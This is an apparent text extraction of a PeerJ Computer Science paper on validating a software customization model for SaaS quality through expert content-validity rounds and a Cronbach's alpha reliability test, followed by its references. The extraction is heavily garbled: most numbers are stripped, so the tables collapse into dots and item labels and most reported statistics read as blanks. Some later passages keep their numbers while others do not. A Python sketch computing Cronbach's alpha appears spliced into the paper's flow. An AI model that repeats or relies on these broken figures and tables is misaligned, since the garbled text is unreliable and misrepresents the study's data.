con . configuration con . . . . com . com . com . com . . com . . com . com . . com . . composition com . . com . . b ext . ext . ext . ext . . ext . . ext . . ext . ext . ext . . ext . extension ext . . ext . . . int . int . int . int . . int . int . . int . . int . int . . int . int . . int . int . . int . . int . . int . integration int . . . int . . . 
(continued on next page) ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) construct round_ round_ item_ i-cvi_ kappa s-cvi_ item_ i-cvi_ kappa s-cvi_ mod . . mod . . mod . . mod . mod . . mod . . mod . . mod . . mod . . mod . . mod . . mod . . mod . . mod . . mod . modification mod . . . . c qa . qa . qa . qa . qa . qa . qa . . qa . qa . . qa . qa . . qa . qa . . qa . qa . . qa . qa . . qa . qa . . qa . qa . . qa . . qa . . qa . saas quality qa . . . qa . . notes. aitems and costructs with red color were removed from the model. bs-cvi of composition construct after remvoing invalid items is . . cs-cvi of modification construct after remvoing invalid items is . . figure results of i-cvi within content validity rounds. full-size doi: . /peerjcs. /fig- ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results of s-cvi within content validity rounds. full-size doi: . /peerjcs. /fig- items obtained i-cvis of . , . , . , and . respectively. in this round, all items that did not meet the minimum i-cvi of . were removed. however, more experts were involved in round than in round (considering the fact that the larger the set of experts, the harder it is to reach consensus), a significant improvement of the i-cvis results was produced in round . figure compares the i-cvis of both rounds. the scores in round varied from . , . , . , and . to . , . , . , and . in round . furthermore, a significant increase in the percentage of items obtaining an i-cvi of . in round was observed. furthermore, the kappa coefficient values in table show that items, items, and items in round received poor, fair, and excellent agreement respectively. conversely, items, items, and items in round received poor, good, and excellent agreement respectively. noticeably, all items with poor agreement also have poor i-cvi values. based on the s-cvi results in table , most of the constructs attained an acceptable s-cvi in both rounds, except for the personalization s-cvi in round that was . . figure shows that all s-cvi values were improved in round , except for the s-cvi value for personalization that dropped from . to . . the decision to delete the personalization construct and all of its associated items was taken for the following reasons: . comments from experts of both rounds indicated different interpretations; some of them thought of this construct as an alternative name for ‘‘customization, whereas others did not associate it with customization. . the s-cvi of . in round did not meet the s-cvi criteria (> = . ). . five of items associated with this construct did not meet the i-cvi criteria (>= . ) in round . moreover, the s-cvis of the composition ( . ) and modification ( . ) constructs in round improved to . and . , respectively, after removing their associated items that breached the i-cvi criteria. detailed calculations of the i-cvis, s-cvis, and kappa ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table the development of model in each version. construct original items deleted total items deleted final version round round personalization configuration composition extension integration modification saas quality total for rounds and are presented in tables in the supplementary documents: appendices d and e. 
because of the satisfactory level of consensus indicated by the i-cvi and s-cvi scores after round , no further rounds were necessary. in its final version, the software customization model for saas quality consisted of items, grouped into six constructs: items for configuration, items for composition, items for extension, items for integration, items for modification, and items for saas quality, as illustrated in table . internal consistency reliability test based on the results of the two content validity evaluation rounds, version of the model was further tested regarding its internal consistency reliability using a five-point likert scale ranging from (strongly disagree) to (strongly agree). in this study, selected profiles, including gender, ages, and familiarity with saas applications, were reported. a sample of software engineering researchers completed the survey. most of the respondents were male (n= , . %). the age of the majority of respondents ( . %) was between and years (n= ), followed by . % and . % for – (n= ) and over (n= ), respectively. the majority of respondents had an excellent knowledge of saas applications (n= , . %) and only . % (n= ) were somewhat familiar with it. the cronbachs alpha for each construct, corrected item-total correlation, and cronbachs alpha coefficients if the item was deleted are summarized in table . reliability analysis showed reasonable internal consistency. the computed values of cronbachs alpha for the configuration (n= ), composition (n= ), extension (n= ), integration (n= ), and modification (n= ) constructs, as well as saas quality (n= ) were . , . , . , . , . , and . , respectively. the corrected item-total correlation coefficients for configuration items ranged from . (con ) to . (con ); composition items ranged from . (com ) to . (com ); extension items ranged from . (ext ) to . (ext ); integration items ranged from . (int ) to . (int ); modification items ranged from . (mod ) to . (mod ); and saas quality items ranged from . (qa ) to . (qa ). ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. table reliability test results of validated model. construct item cronbach’s alpha if item deleted corrected item-total correlation construct item cronbach’s alpha if item deleted corrected item-total correlation con . . int . . con . . int . . con . . int . . b con . . int . . con . . int . . con . . int . . con . . int . . configuration ( . )a con . . int . . com . . integration ( . ) int . . com . . qa . . com . . qa . . composition ( . ) com . . qa . . ext . . qa . . ext . . qa . . ext . . qa . . ext . . qa . . ext . . qa . . extension ( . ) ext . . qa . . mod . . qa . . mod . . qa . . mod . . qa . . mod . . saas quality ( . ) qa . . modification ( . ) mod . . notes. avalue between brackets is cronbach’s alpha results for the construct. bitem with red colour is deleted based on cronbach’s alpha results if item deleted. table also indicates that none of the items significantly reduced the value of the alpha coefficient if they were removed from the construct, except for int (in this case, the value increased from . to . ). moreover, int had the lowest item-total correlation value ( . ), indicating that it did not measure the same construct as the other items. the resulting values indicate that the model has high reliability. 
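the reliability statistics reported above follow standard formulas, and the sketch below shows how cronbach's alpha, the corrected item-total correlation, and alpha-if-item-deleted can be computed for a small hypothetical response matrix (not the survey data of this study). an item like the one flagged in the next table, with a low corrected item-total correlation and a higher alpha when it is removed, would be detected in the same way here.

```python
# cronbach's alpha and item diagnostics; the response matrix X is hypothetical.
import numpy as np

def cronbach_alpha(X):
    """X: respondents x items matrix of likert scores."""
    X = np.asarray(X, dtype=float)
    k = X.shape[1]
    item_vars = X.var(axis=0, ddof=1)
    total_var = X.sum(axis=1).var(ddof=1)
    return (k / (k - 1)) * (1 - item_vars.sum() / total_var)

def corrected_item_total(X):
    X = np.asarray(X, dtype=float)
    out = []
    for i in range(X.shape[1]):
        rest = X.sum(axis=1) - X[:, i]               # total score excluding item i
        out.append(np.corrcoef(X[:, i], rest)[0, 1])
    return out

def alpha_if_deleted(X):
    X = np.asarray(X, dtype=float)
    return [cronbach_alpha(np.delete(X, i, axis=1)) for i in range(X.shape[1])]

# hypothetical responses: six respondents, four items on a 5-point scale;
# the last item tracks the others poorly and raises alpha when deleted.
X = [[5, 5, 4, 4], [4, 4, 4, 2], [5, 4, 5, 5], [2, 3, 2, 3], [3, 3, 3, 4], [4, 4, 5, 2]]
print("alpha:", round(cronbach_alpha(X), 3))
print("corrected item-total:", [round(v, 2) for v in corrected_item_total(X)])
print("alpha if item deleted:", [round(v, 2) for v in alpha_if_deleted(X)])
```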
discussion from the initial development of the software customization model for saas quality published in (ali et al., ), we realized that the concept should be refined. the concept was initially defined based on customization practices and quality attributes in the saas multi-tenant context. each customization practice was assigned to one of the customization approaches ( , , , , , and items for personalization, configuration, composition, extension, integration, and modification, respectively). ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. to refine the model, a rigorous methodology, composed of an iterative content validity evaluation process and a reliability test, was followed. during the two content validity rounds, answers and comments were suggested by experts to further refine the language used and explicitly declare the multi-tenancy concept in the items. consequently, the i-cvis and s-cvis results varied between rounds and . in round , the items that breached the i-cvi criteria were re-written. moreover, a reduction in the number of items (from to ) was achieved. similarly, version , consisting of items, was created after round . a total of items were deleted in this round; , , and items were deleted from the modification, composition, and personalization constructs, respectively. although of items of the personalization construct did not breach the i-cvi criteria, they were deleted due to the removal of the personalization construct that did not meet the s-cvi criteria. several experts had conflicting opinions regarding the personalization construct. one opinion was that personalization is a synonym word for customization, hence, all approaches proposed in this study should be considered personalization approaches. the second point of view was that it is completely different from customization as it does not involve any customer action, which is essential for customization. the authors of this study agreed with the second opinion. the initial inclusion of personalization as an approach to customization in this study was due to the ultimate purpose of both mechanisms to meet the unique requirements of the customer by adapting the application to their needs. the results of rounds and indicated considerable discrepancy in the numbers of items deleted and revised. the number of items deleted in round ( ) was lower than that in round ( ). by contrast, the number of items revised in round ( items) was higher than that in round ( ). this result, however, is expected as the objective of the first round was to revise the items that did not meet the i-cvi criteria rather than delete them. the purpose of round , however, was to remove any item that did not meet the criteria. this strategy, therefore, allowed most of the items to be assessed twice. moreover, with this strategy, stability in the response of experts was also achieved with the recommended minimum number of rounds (two rounds) (landeta, ), overcoming the limitations of iteration structure methods (e.g., the delphi method), which does not specify any number of rounds (keeney, hasson & mckenna, ). the consensus for content validity was reached and an additional round was included to test the internal consistency reliability of the model items and constructs. in this round, software engineer researchers were asked to reassess the items and evaluate them using a - point likert-type scale. 
the reliability, assessed using cronbach's alpha, indicates that the items consistently represent the constructs. in this test, only one item was deleted to increase the value of cronbach's alpha. at the end of this round, all constructs and items achieved the required values of reliability and validity. the final version of the proposed model is shown in the corresponding figure.

figure: final proposed software customization model for saas quality.

threats to validity
three major limitations emerge. these include sample size, selection bias, and modification bias.

sample size
the number of experts involved in the content validation rounds differed between the first and the second round. although this sample is fairly small for the iterative method, smaller numbers are considered sufficient for homogeneous samples (hong et al., ). moreover, when using the content validity index (cvi) method, a small panel of experts is considered sufficient to validate the model (zamanzadeh et al., ). because our samples were relatively homogeneous (academicians) in terms of participants and expertise, a small panel is sufficient for the adopted cvi analysis method, and a larger panel would be unnecessary (polit & beck, ). accordingly, the number of experts used in this study should be considered acceptable. another issue with our sample size is the imbalance in the numbers of experts in rounds 1 and 2. the increased number of experts in round 2 was because the group of experts invited to participate in the second round was larger. although the required threshold value for consensus decreases as the number of experts increases, it is harder to achieve consensus with larger numbers. as such, the increase in the number of experts in round 2 did not skew the results of this study. additionally, it is not required to have a consistent number of participants in all rounds of a study; for instance, cadorin et al. ( ) had different numbers of participants in the first round and in the subsequent rounds of their study.

selection bias
the selection of experts is essential for obtaining valid and reliable results. compared to random selection methods, our purposive sampling of experts may have led to selection bias. in our study, four possible issues related to selection bias were identified:
1. self-selection bias: this concern was mitigated by identifying and approaching the most suitable experts for our study via an extensive systematic mapping study (ali et al., ).
2. homogeneous sample: the diversity of experts strengthens the statistical power and the generalizability of results; however, a homogeneous sample is acceptable in studies that use the iterative method, as it facilitates the group decision-making process (skulmoski, hartman & krahn, ; logue & effken, ).
3. bias of superior individuals: experts were approached based on their published papers that were most related to this study, and every paper had more than one author. therefore, there is a possibility that the experts who participated in this study are from the same organization or university, and in such a case, there is a real possibility that the ideas and opinions of one expert will be influenced by more dominant experts in the same organization (mubarak et al., ; fletcher & marchildon, ).
accordingly, the experts' opinions were collected anonymously via e-mail, without being affected or pressured by other individuals (mubarak et al., ; halim et al., ; stevens et al., ).
4. different experts in each round: another possible limitation is having different expert panels in each round, which is not common in iterative methods (stevens et al., ; parratt et al., ). although having the same experts in the initial round who continue to participate in all rounds of a study provides the opportunity for the experts to alter their opinions in successive rounds based on the results of previous rounds to achieve consensus (stevens et al., ), the results may be influenced by forced consensus through conformity and diverse opinions being relinquished (parratt et al., ). considering this fact, having different experts participate in each round may arguably improve the results of a study (parratt et al., ). it is worth noting that the survey for round 2 was sent to the same experts who were involved in the initial round and none responded within the time limit, leading to new respondents being selected for the second round. in addition, as participation in our study was voluntary, those who participated in round 1 may not have had the time or inclination to continue.

modification bias
the model manipulation applied in this study resulted in the number of constructs being reduced from seven to six by the removal of the personalization construct and its associated items, which did not attain an acceptable cvi value. although this modification to the model may have added a certain level of bias, the deletion of the personalization construct is indirectly supported by the findings of the systematic mapping study (sms), where personalization received the lowest consideration of all customization solutions proposed for saas applications. furthermore, we followed the strategy of revising the items that did not meet the i-cvi criteria rather than deleting them in round 1, leaving the deletion of the invalid item(s)/construct to the subsequent rounds. this strategy provided the opportunity for most of the items to be assessed at least twice. eventually, the deletion of the personalization construct and other items was deemed necessary for the study on grounds supported in the literature and by experts' comments.

conclusions
the comprehension of the generic customization approaches and practices in the saas multi-tenant context, together with the identification of the key quality attributes of saas applications associated with customization, is an opportunity to increase the understanding of saas customization and to create further discussion of the subject. the purpose of this study was, therefore, to develop a software customization model for saas quality to identify possible customization approaches, practices, and quality attributes in the saas multi-tenant context. in addition, this study can be considered the first one, to the best of the authors' knowledge, to develop a theoretical, validated, and reliable software customization model for saas quality. to evaluate this model, an iterative method was used to conceptualize it, assess its content validity, and evaluate its reliability. a preliminary version of this model, composed of seven constructs (six customization approaches and saas quality) and items covering saas customization practices and saas quality attributes, was used.
after the completion of the two rounds of content validity evaluation, one construct and several items were removed. to improve the reliability of the validated model, an additional round was executed, and all constructs achieved the required cronbach's alpha value. furthermore, only one item was removed in this round, as retaining it reduced the cronbach's alpha value of its construct. the final version of the model consisted of six constructs and their associated items, as follows: 1) configuration (eight items), 2) composition (four items), 3) extension (six items), 4) integration, 5) modification (five items), and 6) saas quality. although the iteratively validated model offers some certainty of construct validity, our ongoing research is to evaluate its construct validity and reliability with a larger sample of saas implementation team members, based on the industry environment. in addition, this study is restricted to the quality attributes of saas applications identified in a systematic mapping study (ali et al., ). however, this study does not claim that only these saas quality attributes are associated with customization. future studies could also be conducted to expand the model to include many other quality attributes of saas applications, especially saas attributes related to the affordability quality attribute (e.g., resource cost and maintenance costs). the key contribution of this study is that it advances existing knowledge on saas customization and quality through the development and validation of a software customization model. it also enhances the potential to analyze empirically the impact of software customization on saas quality from software professionals' perspectives. this study can be used as a source of qualitative and quantitative data for further investigation into the statistical linkage between software customization and saas quality. the findings of these future investigations will prompt evaluators, testers, and developers of saas applications to resolve quality-related issues before any customization is introduced.

acknowledgements
the authors gratefully acknowledge the reviewers for their valuable feedback and comments.

additional information and declarations
funding
this work is supported by universiti putra malaysia. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.
grant disclosures
the following grant information was disclosed by the authors: universiti putra malaysia.
competing interests
the authors declare there are no competing interests.
author contributions
• abdulrazzaq qasem ali conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
• abu bakar md sultan conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
• abdul azim abd ghani and hazura zulzalil conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
data availability
the following information was supplied regarding data availability: the raw measurements are available in the supplementary files.
supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs.
#supplemental-information. references akojwar mra, kothari mrv, kahate msa, ganvir mrd. . software as a service with cloud computing. ijecce ( ): – . al-shardan mm, ziani d. . configuration as a service in multi-tenant enterprise resource planning system. lecture notes on software engineering ( ): – . alhamad m, dillon t, chang e. . conceptual sla framework for cloud computing. in: th ieee international conference on digital ecosystems and technologies. piscat- away: ieee, – doi . /dest. . . ali aq, sultan abm, ghani aaa, zulzalil h. . critical issues across saas develop- ment: learning from experience. international journal of advances in electronics and computer science ( ): – . ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /dest. . http://dx.doi.org/ . /peerj-cs. ali aq, sultan abm, ghani aaa, zulzalil h. a. customization of software as a service application: problems and objectives. journal of computer science & computational mathematics ( ): – doi . /jcscm. . . . ali aq, sultan abm, ghani aaa, zulzalil h. b. the five ws taxonomy on cus- tomization of software as a service applications. journal of computer science & computational mathematics ( ): – doi . /jcscm. . . . ali aq, sultan abm, ghani aaa, zulzalil h. a. empirical studies on the impact of software customization on quality attributes: a systematic review. journal of theoretical and applied information technology ( ): – . ali aq, sultan abm, ghani aaa, zulzalil h. b. a systematic mapping study on the customization solutions of software as a service applications. ieee access : – doi . /access. . . alkawsi ga, ali nb, alghushami a. . toward understanding individuals acceptance of internet of things-based services: developing an instrument to measure the acceptance of smart meters. journal of theoretical & applied information technology ( ): – . almorsy m, grundy j, ibrahim as. . tossma: a tenant-oriented saas security management architecture. in: ieee fifth international conference on cloud computing, – doi . /cloud. . . aulbach s, seibold m, jacobs d, kemper a. . extensibility and data sharing in evolving multi-tenant databases. in: ieee th international conference on data engineering, – doi . /icde. . . aulkemeier f, paramartha ma, iacob m-e, van hillegersberg j. . a pluggable service platform architecture for e-commerce. information systems and e-business management ( ): – doi . /s - - - . badidi e. . a framework for software-as-a-service selection and provisioning. arxiv preprint. arxiv: . . bell e, bryman a, harley b. . business research methods. th edition. oxford university press. bhatti mw, ahsan a. . global monitoring and control: a process improvement framework for globally distributed software development teams. journal of global information technology management ( ): – . brehm l, heinzl a, markus ml. . tailoring erp systems: a spectrum of choices and their implications. in: proceedings of the th annual hawaii international conference on system sciences. doi . /hicss. . . cadorin l, bagnasco a, tolotti a, pagnucci n, sasso l. . developing an instrument to measure emotional behaviour abilities of meaningful learning through the delphi technique. journal of advanced nursing ( ): – doi . /jan. . cancian mh, hauck jcr, von wangenheim cg, rabelo rj. . 
discovering software process and product quality criteria in software as a service. in: product-focused software process improvement. berlin, heidelberg: springer berlin heidelberg, – . chaumun m, kabaili h, keller rk, lustman f. . a change impact model for changeability assessment in object-oriented software systems. science of computer ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jcscm. . . http://dx.doi.org/ . /jcscm. . . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /cloud. . http://dx.doi.org/ . /icde. . http://dx.doi.org/ . /s - - - http://arxiv.org/abs/ . http://dx.doi.org/ . /hicss. . http://dx.doi.org/ . /jan. http://dx.doi.org/ . /peerj-cs. programming ( ): – . special issue on software maintenance and reengi- neering (csmr ) doi . /s - ( ) - . chen d, li q, kong l. . process customization framework in saas applica- tions. in: th web information system and application conference, – doi . /wisa. . . coallier f. . software engineering–product quality–part : quality model. geneva: international organization for standardization. cohen l, manion l, morrison k. . research methods in education. routledge. correia a, penha jr, da cruz amr. . an architectural model for customizing the business logic of saas applications. in: icsoft. setúbal, portugal: scitepress. csmic. . service measurement index framework version . . carnegie mellon university. available at https://pdf pro.com/view/service-measurement-index- framework-version- - f a.html. davenport th. . putting the enterprise into the enterprise system. harvard business review ( ): – . davis ll. . instrument review: getting the most from a panel of experts. applied nursing research ( ): – doi . /s - ( ) - . de miranda pg. . saas (software as a service)-infrastructures and applications in real scenarios. phd thesis, instituto superior técnico, universidade tecnológica de. dong j, zhang s, shi y, xu x, guo w. . process customization based on dependent topology in software as a service model. in: the nd international conference on software engineering and data mining. piscataway: ieee, – . duarte filho nf, de souza bermejo ph, zambalde al, de barros us. . saasquality-a method for quality evaluation of software as a service (saas). interna- tional journal of computer science & information technology ( ): – . espadas j, concha d, molina a. . application development over software-as-a- service platforms. in: the third international conference on software engineering advances. ieee, – . espadas j, molina a, jiménez g, molina m, ramírez r, concha d. . a tenant-based resource allocation model for scaling software-as-a-service applications over cloud computing infrastructures. future generation computer systems ( ): – . fan h, hussain fk, younas m, hussain ok. . an integrated personalization framework for saas-based cloud services. future generation computer systems : – doi . /j.future. . . . fletcher aj, marchildon gp. . using the delphi method for qualitative, participa- tory action research in health leadership. international journal of qualitative methods ( ): – . gey f, landuyt dv, joosen w. . middleware for customizable multi-staged dynamic upgrades of multi-tenant saas applications. in: ieee/acm th international conference on utility and cloud computing (ucc). – doi . /ucc. . . gey f, van d, walraven s, joosen w. . feature models at run time feature mid- dleware for multi-tenant saas applications. in: proceedings of the th international workshop on models at run.time. ali et al. 
( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /wisa. . https://pdf pro.com/view/service-measurement-index-framework-version- - f a.html https://pdf pro.com/view/service-measurement-index-framework-version- - f a.html http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /ucc. . http://dx.doi.org/ . /peerj-cs. gilmore jh, pine bj. . the four faces of mass customization. harvard business review ( ): – . guo c-j, sun w, jiang z-b, huang y, gao b, wang z-h. . study of software as a service support platform for small and medium businesses. in: agrawal d, candan ks, li w-s, eds. new frontiers in information and software as services. berlin, heidelberg: springer berlin heidelberg, – . haines mn. . understanding enterprise system customization: an exploration of implementation realities and the key influence factors. information systems management ( ): – doi . / . hair jr jf, anderson re, tatham rl, black wc. . multivariate data analysis. new jersey: pearson education. halim n, sulaiman s, talib k, ng e. . identifying the relevant features of the national digital cadastral database (ndcdb) for spatial analysis by using the delphi technique. in: proc. international conference on research methodology for built environment and engineering. harris cl, holloway s. . development of an evidence-based protocol for care of pilonidal sinus wounds healing by secondary intent using a modified reactive delphi procedure. part one: the literature review. international wound journal ( ): – doi . /j. - x. . .x. he q, han j, yang y, grundy j, jin h. . qos-driven service selection for multi- tenant saas. in: ieee fifth international conference on cloud computing. piscat- away: ieee, – doi . /cloud. . . helmich m, müller j, krüger j, zeier a, enderlein s, plattner h. . mappermania: a framework for native multi-tenancy business object mapping to a persistent data source. in: amcis. atlanta: ais electronic library (aisel). hong qn, pluye p, fábregues s, bartlett g, boardman f, cargo m, dagenais p, gagnon m-p, griffiths f, nicolau b, o’cathain a, rousseau m-c, vedel i. . improving the content validity of the mixed methods appraisal tool: amodified e- delphi study. journal of clinical epidemiology : – doi . /j.jclinepi. . . . it governance institute. . cobit . : control objectives, management guidelines, maturity models. rolling meadows: itgi. joha a, janssen m. . design choices underlying the software as a service (saas) business model from the user perspective: exploring the fourth wave of outsourcing. journal of universal computer science ( ): – . kabbedijk j, jansen s. . variability in multi-tenant environments: architectural design patterns from industry. in: proceedings of the th international conference on advances in conceptual modeling: recent developments and new directions, er’ . berlin, heidelberg: springer-verlag, – . keeney s, hasson f, mckenna hp. . a critical review of the delphi technique as a research methodology for nursing. international journal of nursing studies ( ): – doi . /s - ( ) - . khanjani a. . quality of service model for software as a service in cloud computing from users’ and providers’ perspectives. phd thesis, universiti putra malaysia. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /j. - x. . .x http://dx.doi.org/ . /cloud. . http://dx.doi.org/ . /j.jclinepi. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . 
/peerj-cs. khanjani a, rahman wnwa, ghani aaa, sultan abm. . saas quality of service at- tributes. journal of applied sciences ( ): – doi . /jas. . . . kong l, li q, zheng x. . a novel model supporting customization sharing in saas applications. in: international conference on multimedia information networking and security. – doi . /mines. . . kumara i, han j, colman a, kapuruge m. . software-defined service networking: runtime sharing with performance differentiation in multi-tenant saas applications. in: ieee international conference on services computing. piscataway: ieee, – doi . /scc. . . kumara i, han j, colman a, nguyen t, kapuruge m. . sharing with a difference: realizing service-based saas applications with runtime sharing and variation in dynamic software product lines. in: ieee international conference on services computing. piscataway: ieee, – doi . /scc. . . la hj, kim sd. . a systematic process for developing high quality saas cloud services. in: jaatun mg, zhao g, rong c, eds. cloud computing. berlin, heidelberg: springer berlin heidelberg, – . landeta j. . current validity of the delphi method in social sciences. technological forecasting and social change ( ): – doi . /j.techfore. . . . lee jy, lee jw, cheun dw, kim sd. . a quality model for evaluating software- as-a-service in cloud computing. in: seventh acis international confer- ence on software engineering research, management and applications. – doi . /sera. . . lee s, park sb, lim gg. . using balanced scorecards for the evaluation of software- as-a-service. information & management ( ): – doi . /j.im. . . . lee w, choi m. . a multi-tenant web application framework for saas. in: ieee fifth international conference on cloud computing. piscataway: ieee, – doi . /cloud. . . li h, shi y, li q. . a multi-granularity customization relationship model for saas. in: international conference on web information systems and mining. – doi . /wism. . . liu w, zhang b, liu y, wang d, zhang y. . new model of saas: saas with tenancy agency. in: nd international conference on advanced computer control, – doi . /icacc. . . logue md, effken ja. . validating the personal health records adoption model using a modified e-delphi. journal of advanced nursing ( ): – doi . /j. - . . .x. luo w, strong dm. . a framework for evaluating erp implementation choices. ieee transactions on engineering management ( ): – doi . /tem. . . lynn mr. . determination and quantification of content validity. nursing research ( ): – doi . / - - . makki m, van landuyt d, walraven s, joosen w. . scalable and manageable customization of workflows in multi-tenant saas offerings. in: proceedings of the st ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jas. . . http://dx.doi.org/ . /mines. . http://dx.doi.org/ . /scc. . http://dx.doi.org/ . /scc. . http://dx.doi.org/ . /j.techfore. . . http://dx.doi.org/ . /sera. . http://dx.doi.org/ . /j.im. . . http://dx.doi.org/ . /cloud. . http://dx.doi.org/ . /wism. . http://dx.doi.org/ . /icacc. . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /tem. . http://dx.doi.org/ . / - - http://dx.doi.org/ . /peerj-cs. annual acm symposium on applied computing, sac ’ . new york: acm, – doi . / . . manford c. . the impact of the saas model of software delivery. in: proceedings of the st annual naccq conference, naccq, auckland, new zealand. – . mathiassen l, sandberg ab. . process mass customization in a global software firm. ieee software ( ): – doi . /ms. . . mietzner r, leymann f. . 
generation of bpel customization processes for saas applications from variability descriptors. in: ieee international conference on services computing, vol. , – doi . /scc. . . mietzner r, leymann f, papazoglou mp. . defining composite configurable saas application packages using sca, variability descriptors and multi-tenancy patterns. in: third international conference on internet and web applications and services, – doi . /iciw. . . moens h, de turck f. . feature-based application development and management of multi-tenant applications in clouds. in: proceedings of the th international software product line conference - volume , splc ’ . new york: acm, – doi . / . . moens h, dhoedt b, de turck f. . allocating resources for customizable multi- tenant applications in clouds using dynamic feature placement. future generation computer systems (c): – doi . /j.future. . . . moens h, truyen e, walraven s, joosen w, dhoedt b, de turck f. . developing and managing customizable software as a service using feature model conversion. in: ieee network operations and management symposium. piscataway: ieee, – doi . /noms. . . mohamed f, abu-matar m, mizouni r, al-qutayri m, mahmoud za. . saas dynamic evolution based on model-driven software product lines. in: ieee th international conference on cloud computing technology and science. piscataway: ieee, – doi . /cloudcom. . . mubarak n, hatah e, aris mam, shafie aa, zin cs. . consensus among health- care stakeholders on a collaborative medication therapy management model for chronic diseases in malaysia; a delphi study. plos one ( ):e doi . /journal.pone. . müller j, krüger j, enderlein s, helmich m, zeier a. . customizing enterprise soft- ware as a service applications: back-end extension in a multi-tenancy environment. berlin, heidelberg: springer berlin heidelberg, – . nadanam p, rajmohan r. . qos evaluation for web services in cloud computing. in: third international conference on computing, communication and networking technologies (icccnt’ ). – doi . /icccnt. . . nguyen t, colman a, han j. . a feature-based framework for developing and provisioning customizable web services. ieee transactions on services computing ( ): – doi . /tsc. . . parhizkar m. . impact analysis of enterprise resource planning post-implementation modifications. phd thesis, city, university of london. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /scc. . http://dx.doi.org/ . /iciw. . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /noms. . http://dx.doi.org/ . /cloudcom. . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /icccnt. . http://dx.doi.org/ . /tsc. . http://dx.doi.org/ . /peerj-cs. parratt ja, fahy km, hutchinson m, lohmann g, hastie cr, chaseling m, obrien k. . expert validation of a teamwork assessment rubric: a modified delphi study. nurse education today : – doi . /j.nedt. . . . parthasarathy s, sharma s. . efficiency analysis of erp packages-a customization perspective. computers in industry : – doi . /j.compind. . . . parthasarathy s, sharma s. . impact of customization over software quality in erp projects: an empirical study. software quality journal ( ): – doi . /s - - -x. polit df, beck ct. . the content validity index: are you sure you know what’s being reported? critique and recommendations. research in nursing & health ( ): – doi . /nur. . publications service management. . 
information technology infrastructure library (itil v ). london: publications service management. ralph m. . using variability descriptors to describe customizable saas application templates. institute of architecture of application systems – . rico a, noguera m, garrido jl, benghazi k, barjis j. . extending multi-tenant architectures: a database model for a multi-target support in saas applications. enterprise information system ( ): – doi . / . . . rolia j, krishnamurthy d, xu m, graupner s. . ape: an automated performance engineering process for software as a service environments. report hpl- - , hp labs, hp labs. available at https://www.hpl.hp.com/techreports/ /hpl- - .html. ruehl st, andelfinger u. . applying software product lines to create customiz- able software-as-a-service applications. in: proceedings of the th international software product line conference, volume , splc ’ . new york: acm, : – : doi . / . . ruehl st, wache h, verclas saw. . capturing customers’ requirements towards mixed-tenancy deployments of saas-applications. in: ieee sixth international conference on cloud computing. piscataway: ieee, – doi . /cloud. . . salama m, shawish a, zeid a, kouta m. . integrated qos utility-based model for cloud computing service provider selection. in: ieee th annual com- puter software and applications conference workshops. piscataway: ieee, – doi . /compsacw. . . saleh ai, fouad ma, abu-elkheir m. . classifying requirements for variability optimization in multitenant applications. in: ieee th international conference on cloud computing technology and science. – doi . /cloudcom. . . salih nk, zang t. . variable service process by feature meta-model for saas application. in: international conference on green and ubiquitous technology. – doi . /gut. . . salih nk, zang t. . modeling and self-configuring saas application, corr. arxiv preprint. arxiv: . . ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.nedt. . . http://dx.doi.org/ . /j.compind. . . http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /nur. http://dx.doi.org/ . / . . https://www.hpl.hp.com/techreports/ /hpl- - .html https://www.hpl.hp.com/techreports/ /hpl- - .html http://dx.doi.org/ . / . http://dx.doi.org/ . /cloud. . http://dx.doi.org/ . /compsacw. . http://dx.doi.org/ . /cloudcom. . http://dx.doi.org/ . /gut. . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. samir a, darwish nr. . reusability quality attributes and metrics of saas from perspective of business and provider. international journal of computer science and information security ( ): – . scheibler t, mietzner r, leymann f. . eai as a service—combining the power of executable eai patterns and saas. in: th international ieee enterprise distributed object computing conference. piscataway: ieee, – doi . /edoc. . . schroeter j, cech s, goetz s, wilke c, aßmann u. . towards modeling a variable architecture for multi-tenant saas-applications. in: proceedings of the sixth interna- tional workshop on variability modeling of software-intensive systems, vamos ’ . new york: acm, – doi . / . . sekaran u, bougie r. . research methods for business: a skill building. edition. 